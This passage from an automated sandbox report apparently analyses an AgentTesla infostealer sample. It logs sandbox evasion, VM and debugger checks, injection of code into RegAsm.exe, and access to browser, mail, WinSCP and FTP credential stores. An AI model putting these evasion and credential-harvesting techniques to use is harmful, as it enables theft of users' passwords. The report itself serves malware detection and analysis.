Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2360	Thread sleep count: 3510 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2360	Thread sleep count: 6331 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -599544s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -599433s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598983s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598654s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598215s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597979s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597616s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597275s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597170s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596935s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596257s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -595921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -595544s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -595311s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -595137s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594999s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594889s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep time: -594000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3200	Thread sleep count: 1589 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3200	Thread sleep count: 1117 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3200	Thread sleep count: 669 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3200	Thread sleep count: 1622 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3200	Thread sleep count: 916 > 30	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599433	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598983	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598215	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597979	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597616	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597275	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597170	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596935	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596257	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595137	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594000	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: RegAsm.exe, 00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: RegAsm.exe, 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: x.exe, 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: hgfsZrw6
Source: RegAsm.exe, 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: RegAsm.exe, 00000004.00000002.4524421843.0000000005A9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00C77070 CheckRemoteDebuggerPresent,

4_2_00C77070

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 78B008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 3.2.x.exe.4617600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.45db7d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4653420.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4653420.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4617600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.45db7d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4515067403.000000000280F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 1992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 3.2.x.exe.4617600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.45db7d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4653420.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4653420.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4617600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.45db7d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 1992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 3.2.x.exe.4617600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.45db7d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4653420.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4653420.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4617600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.45db7d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4515067403.000000000280F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
